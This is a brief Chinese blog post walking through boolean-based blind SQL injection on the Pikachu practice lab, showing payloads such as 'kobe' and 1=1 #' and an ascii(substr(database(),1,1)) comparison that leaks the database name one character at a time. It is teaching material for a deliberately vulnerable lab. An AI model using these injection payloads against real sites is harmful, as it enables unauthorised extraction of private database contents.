pikachu sql inject bool盲注

输入框中输入 已知用户名 kobe

显示了用户信息

your uid:3
your email is: kobe@pikachu

输入kobe'看一下情况

显示

您输入的username不存在,请重新输入!

这还不能确定是否存在注入点,换一种方式

kobe' and 1=1 #

可以显示出kobe的数据,改为

kobe' and 1=2 #

显示

您输入的username不存在,请重新输入!

说明存在布尔盲注注入点

kobe' and ascii(substr(database(),1,1))>= 113 #
显示
您输入的username不存在,请重新输入!

kobe' and ascii(substr(database(),1,1))>= 112 #
显示
your uid:3
your email is: kobe@pikachu.com

ascii码112 就是p,通过这种方式可以将数据库名称字符一个个爆出

posted @ 2022-10-29 18:11  明月照江江  阅读(111)  评论(0编辑  收藏  举报